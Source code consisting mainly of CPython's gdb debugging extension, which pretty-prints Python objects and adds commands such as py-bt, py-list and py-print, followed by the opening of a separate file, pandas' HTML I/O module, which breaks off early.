_typename = 'PyDictObject'
def iteritems(self):
'''
Yields a sequence of (PyObjectPtr key, PyObjectPtr value) pairs,
analogous to dict.iteritems()
'''
keys = self.field('ma_keys')
values = self.field('ma_values')
entries, nentries = self._get_entries(keys)
for i in safe_range(nentries):
ep = entries[i]
if long(values):
pyop_value = PyObjectPtr.from_pyobject_ptr(values[i])
else:
pyop_value = PyObjectPtr.from_pyobject_ptr(ep['me_value'])
if not pyop_value.is_null():
pyop_key = PyObjectPtr.from_pyobject_ptr(ep['me_key'])
yield (pyop_key, pyop_value)
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('{...}')
visited.add(self.as_address())
result = {}
for pyop_key, pyop_value in self.iteritems():
proxy_key = pyop_key.proxyval(visited)
proxy_value = pyop_value.proxyval(visited)
result[proxy_key] = proxy_value
return result
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('{...}')
return
visited.add(self.as_address())
out.write('{')
first = True
for pyop_key, pyop_value in self.iteritems():
if not first:
out.write(', ')
first = False
pyop_key.write_repr(out, visited)
out.write(': ')
pyop_value.write_repr(out, visited)
out.write('}')
def _get_entries(self, keys):
dk_nentries = int(keys['dk_nentries'])
dk_size = int(keys['dk_size'])
try:
# <= Python 3.5
return keys['dk_entries'], dk_size
except RuntimeError:
# >= Python 3.6
pass
if dk_size <= 0xFF:
offset = dk_size
elif dk_size <= 0xFFFF:
offset = 2 * dk_size
elif dk_size <= 0xFFFFFFFF:
offset = 4 * dk_size
else:
offset = 8 * dk_size
ent_addr = keys['dk_indices'].address
ent_addr = ent_addr.cast(_type_unsigned_char_ptr()) + offset
ent_ptr_t = gdb.lookup_type('PyDictKeyEntry').pointer()
ent_addr = ent_addr.cast(ent_ptr_t)
return ent_addr, dk_nentries
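# Sizing note for _get_entries (illustrative, for the Python >= 3.6 dict layout
# handled above): dk_indices stores one index per hash slot, and its element
# width grows with dk_size, so the PyDictKeyEntry array starts at
# dk_indices + offset where, for example:
#     dk_size = 8    -> 1-byte indices -> offset = 8
#     dk_size = 256  -> 2-byte indices -> offset = 512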
class PyListObjectPtr(PyObjectPtr):
_typename = 'PyListObject'
def __getitem__(self, i):
# Get the gdb.Value for the (PyObject*) with the given index:
field_ob_item = self.field('ob_item')
return field_ob_item[i]
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('[...]')
visited.add(self.as_address())
result = [PyObjectPtr.from_pyobject_ptr(self[i]).proxyval(visited)
for i in safe_range(int_from_int(self.field('ob_size')))]
return result
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('[...]')
return
visited.add(self.as_address())
out.write('[')
for i in safe_range(int_from_int(self.field('ob_size'))):
if i > 0:
out.write(', ')
element = PyObjectPtr.from_pyobject_ptr(self[i])
element.write_repr(out, visited)
out.write(']')
class PyLongObjectPtr(PyObjectPtr):
_typename = 'PyLongObject'
def proxyval(self, visited):
'''
Python's Include/longintrepr.h has this declaration:
struct _longobject {
PyObject_VAR_HEAD
digit ob_digit[1];
};
with this description:
The absolute value of a number is equal to
SUM(for i=0 through abs(ob_size)-1) ob_digit[i] * 2**(SHIFT*i)
Negative numbers are represented with ob_size < 0;
zero is represented by ob_size == 0.
where SHIFT can be either:
#define PyLong_SHIFT 30
#define PyLong_SHIFT 15
'''
ob_size = long(self.field('ob_size'))
if ob_size == 0:
return 0
ob_digit = self.field('ob_digit')
if gdb.lookup_type('digit').sizeof == 2:
SHIFT = 15
else:
SHIFT = 30
digits = [long(ob_digit[i]) * 2**(SHIFT*i)
for i in safe_range(abs(ob_size))]
result = sum(digits)
if ob_size < 0:
result = -result
return result
def write_repr(self, out, visited):
# Write this out as a Python 3 int literal, i.e. without the "L" suffix
proxy = self.proxyval(visited)
out.write("%s" % proxy)
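# Worked example of the digit reconstruction above (hypothetical digits): with
# SHIFT = 30, ob_size = 2 and ob_digit = [5, 3]:
#     value = 5 * 2**(30*0) + 3 * 2**(30*1) = 3221225477
# and ob_size = -2 with the same digits would yield -3221225477.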
class PyBoolObjectPtr(PyLongObjectPtr):
"""
Class wrapping a gdb.Value that's a PyBoolObject* i.e. one of the two
<bool> instances (Py_True/Py_False) within the process being debugged.
"""
def proxyval(self, visited):
if PyLongObjectPtr.proxyval(self, visited):
return True
else:
return False
class PyNoneStructPtr(PyObjectPtr):
"""
Class wrapping a gdb.Value that's a PyObject* pointing to the
singleton (we hope) _Py_NoneStruct with ob_type PyNone_Type
"""
_typename = 'PyObject'
def proxyval(self, visited):
return None
class PyFrameObjectPtr(PyObjectPtr):
_typename = 'PyFrameObject'
def __init__(self, gdbval, cast_to=None):
PyObjectPtr.__init__(self, gdbval, cast_to)
if not self.is_optimized_out():
self.co = PyCodeObjectPtr.from_pyobject_ptr(self.field('f_code'))
self.co_name = self.co.pyop_field('co_name')
self.co_filename = self.co.pyop_field('co_filename')
self.f_lineno = int_from_int(self.field('f_lineno'))
self.f_lasti = int_from_int(self.field('f_lasti'))
self.co_nlocals = int_from_int(self.co.field('co_nlocals'))
self.co_varnames = PyTupleObjectPtr.from_pyobject_ptr(self.co.field('co_varnames'))
def iter_locals(self):
'''
Yield a sequence of (name,value) pairs of PyObjectPtr instances, for
the local variables of this frame
'''
if self.is_optimized_out():
return
f_localsplus = self.field('f_localsplus')
for i in safe_range(self.co_nlocals):
pyop_value = PyObjectPtr.from_pyobject_ptr(f_localsplus[i])
if not pyop_value.is_null():
pyop_name = PyObjectPtr.from_pyobject_ptr(self.co_varnames[i])
yield (pyop_name, pyop_value)
def iter_globals(self):
'''
Yield a sequence of (name,value) pairs of PyObjectPtr instances, for
the global variables of this frame
'''
if self.is_optimized_out():
return ()
pyop_globals = self.pyop_field('f_globals')
return pyop_globals.iteritems()
def iter_builtins(self):
'''
Yield a sequence of (name,value) pairs of PyObjectPtr instances, for
the builtin variables
'''
if self.is_optimized_out():
return ()
pyop_builtins = self.pyop_field('f_builtins')
return pyop_builtins.iteritems()
def get_var_by_name(self, name):
'''
Look for the named local variable, returning a (PyObjectPtr, scope) pair
where scope is a string 'local', 'global', 'builtin'
If not found, return (None, None)
'''
for pyop_name, pyop_value in self.iter_locals():
if name == pyop_name.proxyval(set()):
return pyop_value, 'local'
for pyop_name, pyop_value in self.iter_globals():
if name == pyop_name.proxyval(set()):
return pyop_value, 'global'
for pyop_name, pyop_value in self.iter_builtins():
if name == pyop_name.proxyval(set()):
return pyop_value, 'builtin'
return None, None
def filename(self):
'''Get the path of the current Python source file, as a string'''
if self.is_optimized_out():
return '(frame information optimized out)'
return self.co_filename.proxyval(set())
def current_line_num(self):
'''Get current line number as an integer (1-based)
Translated from PyFrame_GetLineNumber and PyCode_Addr2Line
See Objects/lnotab_notes.txt
'''
if self.is_optimized_out():
return None
f_trace = self.field('f_trace')
if long(f_trace) != 0:
# we have a non-NULL f_trace:
return self.f_lineno
else:
#try:
return self.co.addr2line(self.f_lasti)
#except ValueError:
# return self.f_lineno
def current_line(self):
'''Get the text of the current source line as a string, with a trailing
newline character'''
if self.is_optimized_out():
return '(frame information optimized out)'
filename = self.filename()
try:
f = open(os_fsencode(filename), 'r')
except IOError:
return None
with f:
all_lines = f.readlines()
# Convert from 1-based current_line_num to 0-based list offset:
return all_lines[self.current_line_num()-1]
def write_repr(self, out, visited):
if self.is_optimized_out():
out.write('(frame information optimized out)')
return
out.write('Frame 0x%x, for file %s, line %i, in %s ('
% (self.as_address(),
self.co_filename.proxyval(visited),
self.current_line_num(),
self.co_name.proxyval(visited)))
first = True
for pyop_name, pyop_value in self.iter_locals():
if not first:
out.write(', ')
first = False
out.write(pyop_name.proxyval(visited))
out.write('=')
pyop_value.write_repr(out, visited)
out.write(')')
def print_traceback(self):
if self.is_optimized_out():
sys.stdout.write(' (frame information optimized out)\n')
return
visited = set()
sys.stdout.write(' File "%s", line %i, in %s\n'
% (self.co_filename.proxyval(visited),
self.current_line_num(),
self.co_name.proxyval(visited)))
class PySetObjectPtr(PyObjectPtr):
_typename = 'PySetObject'
@classmethod
def _dummy_key(self):
return gdb.lookup_global_symbol('_PySet_Dummy').value()
def __iter__(self):
dummy_ptr = self._dummy_key()
table = self.field('table')
for i in safe_range(self.field('mask') + 1):
setentry = table[i]
key = setentry['key']
if key != 0 and key != dummy_ptr:
yield PyObjectPtr.from_pyobject_ptr(key)
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('%s(...)' % self.safe_tp_name())
visited.add(self.as_address())
members = (key.proxyval(visited) for key in self)
if self.safe_tp_name() == 'frozenset':
return frozenset(members)
else:
return set(members)
def write_repr(self, out, visited):
# Emulate Python 3's set_repr
tp_name = self.safe_tp_name()
# Guard against infinite loops:
if self.as_address() in visited:
out.write('(...)')
return
visited.add(self.as_address())
# Python 3's set_repr special-cases the empty set:
if not self.field('used'):
out.write(tp_name)
out.write('()')
return
# Python 3 uses {} for set literals:
if tp_name != 'set':
out.write(tp_name)
out.write('(')
out.write('{')
first = True
for key in self:
if not first:
out.write(', ')
first = False
key.write_repr(out, visited)
out.write('}')
if tp_name != 'set':
out.write(')')
class PyBytesObjectPtr(PyObjectPtr):
_typename = 'PyBytesObject'
def __str__(self):
field_ob_size = self.field('ob_size')
field_ob_sval = self.field('ob_sval')
char_ptr = field_ob_sval.address.cast(_type_unsigned_char_ptr())
return ''.join([chr(char_ptr[i]) for i in safe_range(field_ob_size)])
def proxyval(self, visited):
return str(self)
def write_repr(self, out, visited):
# Write this out as a Python 3 bytes literal, i.e. with a "b" prefix
# Get a PyStringObject* within the Python 2 gdb process:
proxy = self.proxyval(visited)
# Transliteration of Python 3's Objects/bytesobject.c:PyBytes_Repr
# to Python 2 code:
quote = "'"
if "'" in proxy and not '"' in proxy:
quote = '"'
out.write('b')
out.write(quote)
for byte in proxy:
if byte == quote or byte == '\\':
out.write('\\')
out.write(byte)
elif byte == '\t':
out.write('\\t')
elif byte == '\n':
out.write('\\n')
elif byte == '\r':
out.write('\\r')
elif byte < ' ' or ord(byte) >= 0x7f:
out.write('\\x')
out.write(hexdigits[(ord(byte) & 0xf0) >> 4])
out.write(hexdigits[ord(byte) & 0xf])
else:
out.write(byte)
out.write(quote)
class PyTupleObjectPtr(PyObjectPtr):
_typename = 'PyTupleObject'
def __getitem__(self, i):
# Get the gdb.Value for the (PyObject*) with the given index:
field_ob_item = self.field('ob_item')
return field_ob_item[i]
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('(...)')
visited.add(self.as_address())
result = tuple(PyObjectPtr.from_pyobject_ptr(self[i]).proxyval(visited)
for i in safe_range(int_from_int(self.field('ob_size'))))
return result
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('(...)')
return
visited.add(self.as_address())
out.write('(')
for i in safe_range(int_from_int(self.field('ob_size'))):
if i > 0:
out.write(', ')
element = PyObjectPtr.from_pyobject_ptr(self[i])
element.write_repr(out, visited)
if self.field('ob_size') == 1:
out.write(',)')
else:
out.write(')')
class PyTypeObjectPtr(PyObjectPtr):
_typename = 'PyTypeObject'
def _unichr_is_printable(char):
# Logic adapted from Python 3's Tools/unicode/makeunicodedata.py
if char == u" ":
return True
import unicodedata
return unicodedata.category(char) not in ("C", "Z")
if sys.maxunicode >= 0x10000:
_unichr = unichr
else:
# Needed for proper surrogate support if sizeof(Py_UNICODE) is 2 in gdb
def _unichr(x):
if x < 0x10000:
return unichr(x)
x -= 0x10000
ch1 = 0xD800 | (x >> 10)
ch2 = 0xDC00 | (x & 0x3FF)
return unichr(ch1) + unichr(ch2)
class PyUnicodeObjectPtr(PyObjectPtr):
_typename = 'PyUnicodeObject'
def char_width(self):
_type_Py_UNICODE = gdb.lookup_type('Py_UNICODE')
return _type_Py_UNICODE.sizeof
def proxyval(self, visited):
global _is_pep393
if _is_pep393 is None:
fields = gdb.lookup_type('PyUnicodeObject').target().fields()
_is_pep393 = 'data' in [f.name for f in fields]
if _is_pep393:
# Python 3.3 and newer
may_have_surrogates = False
compact = self.field('_base')
ascii = compact['_base']
state = ascii['state']
is_compact_ascii = (int(state['ascii']) and int(state['compact']))
if not int(state['ready']):
# string is not ready
field_length = long(compact['wstr_length'])
may_have_surrogates = True
field_str = ascii['wstr']
else:
field_length = long(ascii['length'])
if is_compact_ascii:
field_str = ascii.address + 1
elif int(state['compact']):
field_str = compact.address + 1
else:
field_str = self.field('data')['any']
repr_kind = int(state['kind'])
if repr_kind == 1:
field_str = field_str.cast(_type_unsigned_char_ptr())
elif repr_kind == 2:
field_str = field_str.cast(_type_unsigned_short_ptr())
elif repr_kind == 4:
field_str = field_str.cast(_type_unsigned_int_ptr())
else:
# Python 3.2 and earlier
field_length = long(self.field('length'))
field_str = self.field('str')
may_have_surrogates = self.char_width() == 2
# Gather a list of ints from the Py_UNICODE array; these are either
# UCS-1, UCS-2 or UCS-4 code points:
if not may_have_surrogates:
Py_UNICODEs = [int(field_str[i]) for i in safe_range(field_length)]
else:
# A more elaborate routine if sizeof(Py_UNICODE) is 2 in the
# inferior process: we must join surrogate pairs.
Py_UNICODEs = []
i = 0
limit = safety_limit(field_length)
while i < limit:
ucs = int(field_str[i])
i += 1
if ucs < 0xD800 or ucs >= 0xDC00 or i == field_length:
Py_UNICODEs.append(ucs)
continue
# This could be a surrogate pair.
ucs2 = int(field_str[i])
if ucs2 < 0xDC00 or ucs2 > 0xDFFF:
continue
code = (ucs & 0x03FF) << 10
code |= ucs2 & 0x03FF
code += 0x00010000
Py_UNICODEs.append(code)
i += 1
# Convert the int code points to unicode characters, and generate a
# local unicode instance.
# This splits surrogate pairs if sizeof(Py_UNICODE) is 2 here (in gdb).
result = u''.join([
(_unichr(ucs) if ucs <= 0x10ffff else '\ufffd')
for ucs in Py_UNICODEs])
return result
def write_repr(self, out, visited):
# Write this out as a Python 3 str literal, i.e. without a "u" prefix
# Get a PyUnicodeObject* within the Python 2 gdb process:
proxy = self.proxyval(visited)
# Transliteration of Python 3's Object/unicodeobject.c:unicode_repr
# to Python 2:
if "'" in proxy and '"' not in proxy:
quote = '"'
else:
quote = "'"
out.write(quote)
i = 0
while i < len(proxy):
ch = proxy[i]
i += 1
# Escape quotes and backslashes
if ch == quote or ch == '\\':
out.write('\\')
out.write(ch)
# Map special whitespace to '\t', \n', '\r'
elif ch == '\t':
out.write('\\t')
elif ch == '\n':
out.write('\\n')
elif ch == '\r':
out.write('\\r')
# Map non-printable US ASCII to '\xhh'
elif ch < ' ' or ch == 0x7F:
out.write('\\x')
out.write(hexdigits[(ord(ch) >> 4) & 0x000F])
out.write(hexdigits[ord(ch) & 0x000F])
# Copy ASCII characters as-is
elif ord(ch) < 0x7F:
out.write(ch)
# Non-ASCII characters
else:
ucs = ch
ch2 = None
if sys.maxunicode < 0x10000:
# If sizeof(Py_UNICODE) is 2 here (in gdb), join
# surrogate pairs before calling _unichr_is_printable.
if (i < len(proxy)
and 0xD800 <= ord(ch) < 0xDC00 \
and 0xDC00 <= ord(proxy[i]) <= 0xDFFF):
ch2 = proxy[i]
ucs = ch + ch2
i += 1
# Unfortunately, Python 2's unicode type doesn't seem
# to expose the "isprintable" method
printable = _unichr_is_printable(ucs)
if printable:
try:
ucs.encode(ENCODING)
except UnicodeEncodeError:
printable = False
# Map Unicode whitespace and control characters
# (categories Z* and C* except ASCII space)
if not printable:
if ch2 is not None:
# Match Python 3's representation of non-printable
# wide characters.
code = (ord(ch) & 0x03FF) << 10
code |= ord(ch2) & 0x03FF
code += 0x00010000
else:
code = ord(ucs)
# Map 8-bit characters to '\\xhh'
if code <= 0xff:
out.write('\\x')
out.write(hexdigits[(code >> 4) & 0x000F])
out.write(hexdigits[code & 0x000F])
# Map 21-bit characters to '\U00xxxxxx'
elif code >= 0x10000:
out.write('\\U')
out.write(hexdigits[(code >> 28) & 0x0000000F])
out.write(hexdigits[(code >> 24) & 0x0000000F])
out.write(hexdigits[(code >> 20) & 0x0000000F])
out.write(hexdigits[(code >> 16) & 0x0000000F])
out.write(hexdigits[(code >> 12) & 0x0000000F])
out.write(hexdigits[(code >> 8) & 0x0000000F])
out.write(hexdigits[(code >> 4) & 0x0000000F])
out.write(hexdigits[code & 0x0000000F])
# Map 16-bit characters to '\uxxxx'
else:
out.write('\\u')
out.write(hexdigits[(code >> 12) & 0x000F])
out.write(hexdigits[(code >> 8) & 0x000F])
out.write(hexdigits[(code >> 4) & 0x000F])
out.write(hexdigits[code & 0x000F])
else:
# Copy characters as-is
out.write(ch)
if ch2 is not None:
out.write(ch2)
out.write(quote)
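# Surrogate-pair arithmetic used above, as a worked example (the code point is
# chosen only for illustration): U+1F600 is stored as the UTF-16 pair
# 0xD83D, 0xDE00 when sizeof(Py_UNICODE) == 2, and is recombined as
#     (((0xD83D & 0x3FF) << 10) | (0xDE00 & 0x3FF)) + 0x10000 == 0x1F600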
class wrapperobject(PyObjectPtr):
_typename = 'wrapperobject'
def safe_name(self):
try:
name = self.field('descr')['d_base']['name'].string()
return repr(name)
except (NullPyObjectPtr, RuntimeError):
return '<unknown name>'
def safe_tp_name(self):
try:
return self.field('self')['ob_type']['tp_name'].string()
except (NullPyObjectPtr, RuntimeError):
return '<unknown tp_name>'
def safe_self_addresss(self):
try:
address = long(self.field('self'))
return '%#x' % address
except (NullPyObjectPtr, RuntimeError):
return '<failed to get self address>'
def proxyval(self, visited):
name = self.safe_name()
tp_name = self.safe_tp_name()
self_address = self.safe_self_addresss()
return ("<method-wrapper %s of %s object at %s>"
% (name, tp_name, self_address))
def write_repr(self, out, visited):
proxy = self.proxyval(visited)
out.write(proxy)
def int_from_int(gdbval):
return int(str(gdbval))
def stringify(val):
# TODO: repr() puts everything on one line; pformat can be nicer, but
# can lead to v.long results; this function isolates the choice
if True:
return repr(val)
else:
from pprint import pformat
return pformat(val)
class PyObjectPtrPrinter:
"Prints a (PyObject*)"
def __init__ (self, gdbval):
self.gdbval = gdbval
def to_string (self):
pyop = PyObjectPtr.from_pyobject_ptr(self.gdbval)
if True:
return pyop.get_truncated_repr(MAX_OUTPUT_LEN)
else:
# Generate full proxy value then stringify it.
# Doing so could be expensive
proxyval = pyop.proxyval(set())
return stringify(proxyval)
def pretty_printer_lookup(gdbval):
type = gdbval.type.unqualified()
if type.code != gdb.TYPE_CODE_PTR:
return None
type = type.target().unqualified()
t = str(type)
if t in ("PyObject", "PyFrameObject", "PyUnicodeObject", "wrapperobject"):
return PyObjectPtrPrinter(gdbval)
"""
During development, I've been manually invoking the code in this way:
(gdb) python
import sys
sys.path.append('/home/david/coding/python-gdb')
import libpython
end
then reloading it after each edit like this:
(gdb) python reload(libpython)
The following code should ensure that the prettyprinter is registered
if the code is autoloaded by gdb when visiting libpython.so, provided
that this python file is installed to the same path as the library (or its
.debug file) plus a "-gdb.py" suffix, e.g:
/usr/lib/libpython2.6.so.1.0-gdb.py
/usr/lib/debug/usr/lib/libpython2.6.so.1.0.debug-gdb.py
"""
def register (obj):
if obj is None:
obj = gdb
# Wire up the pretty-printer
obj.pretty_printers.append(pretty_printer_lookup)
register (gdb.current_objfile ())
# Unfortunately, the exact API exposed by the gdb module varies somewhat
# from build to build
# See http://bugs.python.org/issue8279?#msg102276
class Frame(object):
'''
Wrapper for gdb.Frame, adding various methods
'''
def __init__(self, gdbframe):
self._gdbframe = gdbframe
def older(self):
older = self._gdbframe.older()
if older:
return Frame(older)
else:
return None
def newer(self):
newer = self._gdbframe.newer()
if newer:
return Frame(newer)
else:
return None
def select(self):
'''If supported, select this frame and return True; return False if unsupported
Not all builds have a gdb.Frame.select method; seems to be present on Fedora 12
onwards, but absent on Ubuntu buildbot'''
if not hasattr(self._gdbframe, 'select'):
print ('Unable to select frame: '
'this build of gdb does not expose a gdb.Frame.select method')
return False
self._gdbframe.select()
return True
def get_index(self):
'''Calculate index of frame, starting at 0 for the newest frame within
this thread'''
index = 0
# Go down until you reach the newest frame:
iter_frame = self
while iter_frame.newer():
index += 1
iter_frame = iter_frame.newer()
return index
# We divide frames into:
# - "python frames":
# - "bytecode frames" i.e. PyEval_EvalFrameEx
# - "other python frames": things that are of interest from a python
# POV, but aren't bytecode (e.g. GC, GIL)
# - everything else
def is_python_frame(self):
'''Is this a _PyEval_EvalFrameDefault frame, or some other important
frame? (see is_other_python_frame for what "important" means in this
context)'''
if self.is_evalframe():
return True
if self.is_other_python_frame():
return True
return False
def is_evalframe(self):
'''Is this a _PyEval_EvalFrameDefault frame?'''
if self._gdbframe.name() == EVALFRAME:
'''
I believe we also need to filter on the inline
struct frame_id.inline_depth, only regarding frames with
an inline depth of 0 as actually being this function
So we reject those with type gdb.INLINE_FRAME
'''
if self._gdbframe.type() == gdb.NORMAL_FRAME:
# We have a _PyEval_EvalFrameDefault frame:
return True
return False
def is_other_python_frame(self):
'''Is this frame worth displaying in python backtraces?
Examples:
- waiting on the GIL
- garbage-collecting
- within a CFunction
If it is, return a descriptive string
For other frames, return False
'''
if self.is_waiting_for_gil():
return 'Waiting for the GIL'
if self.is_gc_collect():
return 'Garbage-collecting'
# Detect invocations of PyCFunction instances:
frame = self._gdbframe
caller = frame.name()
if not caller:
return False
if caller in ('_PyCFunction_FastCallDict',
'_PyCFunction_FastCallKeywords'):
arg_name = 'func'
# Within that frame:
# "func" is the local containing the PyObject* of the
# PyCFunctionObject instance
# "f" is the same value, but cast to (PyCFunctionObject*)
# "self" is the (PyObject*) of the 'self'
try:
# Use the prettyprinter for the func:
func = frame.read_var(arg_name)
return str(func)
except RuntimeError:
return 'PyCFunction invocation (unable to read %s)' % arg_name
if caller == 'wrapper_call':
try:
func = frame.read_var('wp')
return str(func)
except RuntimeError:
return '<wrapper_call invocation>'
# This frame isn't worth reporting:
return False
def is_waiting_for_gil(self):
'''Is this frame waiting on the GIL?'''
# This assumes the _POSIX_THREADS version of Python/ceval_gil.h:
name = self._gdbframe.name()
if name:
return 'pthread_cond_timedwait' in name
def is_gc_collect(self):
'''Is this frame "collect" within the garbage-collector?'''
return self._gdbframe.name() == 'collect'
def get_pyop(self):
try:
f = self._gdbframe.read_var('f')
frame = PyFrameObjectPtr.from_pyobject_ptr(f)
if not frame.is_optimized_out():
return frame
# gdb is unable to get the "f" argument of PyEval_EvalFrameEx()
# because it was "optimized out". Try to get "f" from the frame
# of the caller, PyEval_EvalCodeEx().
orig_frame = frame
caller = self._gdbframe.older()
if caller:
f = caller.read_var('f')
frame = PyFrameObjectPtr.from_pyobject_ptr(f)
if not frame.is_optimized_out():
return frame
return orig_frame
except ValueError:
return None
@classmethod
def get_selected_frame(cls):
_gdbframe = gdb.selected_frame()
if _gdbframe:
return Frame(_gdbframe)
return None
@classmethod
def get_selected_python_frame(cls):
'''Try to obtain the Frame for the python-related code in the selected
frame, or None'''
try:
frame = cls.get_selected_frame()
except gdb.error:
# No frame: Python didn't start yet
return None
while frame:
if frame.is_python_frame():
return frame
frame = frame.older()
# Not found:
return None
@classmethod
def get_selected_bytecode_frame(cls):
'''Try to obtain the Frame for the python bytecode interpreter in the
selected GDB frame, or None'''
frame = cls.get_selected_frame()
while frame:
if frame.is_evalframe():
return frame
frame = frame.older()
# Not found:
return None
def print_summary(self):
if self.is_evalframe():
pyop = self.get_pyop()
if pyop:
line = pyop.get_truncated_repr(MAX_OUTPUT_LEN)
write_unicode(sys.stdout, '#%i %s\n' % (self.get_index(), line))
if not pyop.is_optimized_out():
line = pyop.current_line()
if line is not None:
sys.stdout.write(' %s\n' % line.strip())
else:
sys.stdout.write('#%i (unable to read python frame information)\n' % self.get_index())
else:
info = self.is_other_python_frame()
if info:
sys.stdout.write('#%i %s\n' % (self.get_index(), info))
else:
sys.stdout.write('#%i\n' % self.get_index())
def print_traceback(self):
if self.is_evalframe():
pyop = self.get_pyop()
if pyop:
pyop.print_traceback()
if not pyop.is_optimized_out():
line = pyop.current_line()
if line is not None:
sys.stdout.write(' %s\n' % line.strip())
else:
sys.stdout.write(' (unable to read python frame information)\n')
else:
info = self.is_other_python_frame()
if info:
sys.stdout.write(' %s\n' % info)
else:
sys.stdout.write(' (not a python frame)\n')
class PyList(gdb.Command):
'''List the current Python source code, if any
Use
py-list START
to list at a different line number within the python source.
Use
py-list START, END
to list a specific range of lines within the python source.
'''
def __init__(self):
gdb.Command.__init__ (self,
"py-list",
gdb.COMMAND_FILES,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
import re
start = None
end = None
m = re.match(r'\s*(\d+)\s*', args)
if m:
start = int(m.group(0))
end = start + 10
m = re.match(r'\s*(\d+)\s*,\s*(\d+)\s*', args)
if m:
start, end = map(int, m.groups())
# py-list requires an actual PyEval_EvalFrameEx frame:
frame = Frame.get_selected_bytecode_frame()
if not frame:
print('Unable to locate gdb frame for python bytecode interpreter')
return
pyop = frame.get_pyop()
if not pyop or pyop.is_optimized_out():
print('Unable to read information on python frame')
return
filename = pyop.filename()
lineno = pyop.current_line_num()
if start is None:
start = lineno - 5
end = lineno + 5
if start<1:
start = 1
try:
f = open(os_fsencode(filename), 'r')
except IOError as err:
sys.stdout.write('Unable to open %s: %s\n'
% (filename, err))
return
with f:
all_lines = f.readlines()
# start and end are 1-based, all_lines is 0-based;
# so [start-1:end] as a python slice gives us [start, end] as a
# closed interval
for i, line in enumerate(all_lines[start-1:end]):
linestr = str(i+start)
# Highlight current line:
if i + start == lineno:
linestr = '>' + linestr
sys.stdout.write('%4s %s' % (linestr, line))
# ...and register the command:
PyList()
def move_in_stack(move_up):
'''Move up or down the stack (for the py-up/py-down command)'''
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
while frame:
if move_up:
iter_frame = frame.older()
else:
iter_frame = frame.newer()
if not iter_frame:
break
if iter_frame.is_python_frame():
# Result:
if iter_frame.select():
iter_frame.print_summary()
return
frame = iter_frame
if move_up:
print('Unable to find an older python frame')
else:
print('Unable to find a newer python frame')
class PyUp(gdb.Command):
'Select and print the python stack frame that called this one (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-up",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
move_in_stack(move_up=True)
class PyDown(gdb.Command):
'Select and print the python stack frame called by this one (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-down",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
move_in_stack(move_up=False)
# Not all builds of gdb have gdb.Frame.select
if hasattr(gdb.Frame, 'select'):
PyUp()
PyDown()
class PyBacktraceFull(gdb.Command):
'Display the current python frame and all the frames within its call stack (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-bt-full",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
while frame:
if frame.is_python_frame():
frame.print_summary()
frame = frame.older()
PyBacktraceFull()
class PyBacktrace(gdb.Command):
'Display the current python frame and all the frames within its call stack (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-bt",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
sys.stdout.write('Traceback (most recent call first):\n')
while frame:
if frame.is_python_frame():
frame.print_traceback()
frame = frame.older()
PyBacktrace()
class PyPrint(gdb.Command):
'Look up the given python variable name, and print it'
def __init__(self):
gdb.Command.__init__ (self,
"py-print",
gdb.COMMAND_DATA,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
name = str(args)
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
pyop_frame = frame.get_pyop()
if not pyop_frame:
print('Unable to read information on python frame')
return
pyop_var, scope = pyop_frame.get_var_by_name(name)
if pyop_var:
print('%s %r = %s'
% (scope,
name,
pyop_var.get_truncated_repr(MAX_OUTPUT_LEN)))
else:
print('%r not found' % name)
PyPrint()
class PyLocals(gdb.Command):
'Look up the given python variable name, and print it'
def __init__(self):
gdb.Command.__init__ (self,
"py-locals",
gdb.COMMAND_DATA,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
name = str(args)
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
pyop_frame = frame.get_pyop()
if not pyop_frame:
print('Unable to read information on python frame')
return
for pyop_name, pyop_value in pyop_frame.iter_locals():
print('%s = %s'
% (pyop_name.proxyval(set()),
pyop_value.get_truncated_repr(MAX_OUTPUT_LEN)))
PyLocals()
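# Illustrative gdb session using the commands registered above (the exact
# output depends entirely on the inferior process; nothing here is a recorded
# transcript):
#     (gdb) py-bt          # python-level traceback of the selected thread
#     (gdb) py-list        # source listing around the current python line
#     (gdb) py-up          # move one python frame towards the caller
#     (gdb) py-print x     # look up "x" in locals/globals/builtins
#     (gdb) py-locals      # dump all locals of the current python frame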
|
py | 7df7cc3326c7748e772bf396dd87e4e776843413 | """:mod:`pandas.io.html` is a module containing functionality for dealing with
HTML IO.
"""
from distutils.version import LooseVersion
import numbers
import os
import re
import pandas.compat as compat
from pandas.compat import (
binary_type, iteritems, lmap, lrange, raise_with_traceback, string_types)
from pandas.errors import AbstractMethodError, EmptyDataError
from pandas.core.dtypes.common import is_list_like
from pandas import Series
from pandas.io.common import _is_url, _validate_header_arg, urlopen
from pandas.io.formats.printing import pprint_thing
from pandas.io.parsers import TextParser
_IMPORTS = False
_HAS_BS4 = False
_HAS_LXML = False
_HAS_HTML5LIB = False
def _importers():
# import things we need
# but make this done on a first use basis
global _IMPORTS
if _IMPORTS:
return
global _HAS_BS4, _HAS_LXML, _HAS_HTML5LIB
try:
import bs4 # noqa
_HAS_BS4 = True
except ImportError:
pass
try:
